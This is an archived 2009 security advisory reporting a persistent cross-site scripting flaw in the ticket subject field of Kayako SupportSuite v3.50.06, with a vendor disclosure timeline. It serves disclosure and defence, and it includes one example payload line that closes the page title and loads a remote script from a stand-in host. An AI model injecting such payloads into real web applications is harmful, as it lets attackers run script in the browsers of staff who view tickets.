[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[NGENUITY] - Ticket Subject Persistent XSS in Kayako SupportSuite
- To: full-disclosure@xxxxxxxxxxxxxxxxx, bugtraq@xxxxxxxxxxxxxxxxx
- Subject: [NGENUITY] - Ticket Subject Persistent XSS in Kayako SupportSuite
- From: Adam Baldwin <adam_baldwin@xxxxxxxxxxxxxxx>
- Date: Sat, 08 Aug 2009 09:07:37 -0700
nGenuity Information Services – Security Advisory
Advisory ID: NGENUITY-2009-008 - Ticket Subject Persistent XSS in
Kayako SupportSuite
Application: SupportSuite v3.50.06
Vendor: Kayako
Vendor website: http://www.kayako.com
Author: Adam Baldwin (adam_baldwin@xxxxxxxxxxxxxxx)
Class: Persistent Cross-Site Scripting
I. BACKGROUND
"SupportSuite is [Kayako's] flagship product, integrating the
ticket and
e-mail management features of eSupport with the live chat and visitor
monitoring features of LiveResponse." [1]
II. DETAILS
The subject field of a newly created support ticket is not properly
encoded before
being sent to the browser when the ticket details are viewed. More
information
on cross-site scripting please refer to the Common Weakness
Enumeration specification
available cwe.mitre.org [2].
An example attack might look similar to the following.
</title><script src="example.com/attack.js"></script>
III. REFERENCES
[1] - http://www.kayako.com
[2] - http://cwe.mitre.org/data/definitions/79.html
IV. VENDOR COMMUNICATION
7.17.2009 - Vulnerability Discovery
7.20.2009 - Initial Vendor Response
7.21.2009 - Patch created, Will be pushed to next stable release
8.08.2009 - Advisory released
http://www.ngenuity.org/wordpress/2009/08/08/ngenuity-ticket-subject-persistent-xss-in-kayako-supportsuite/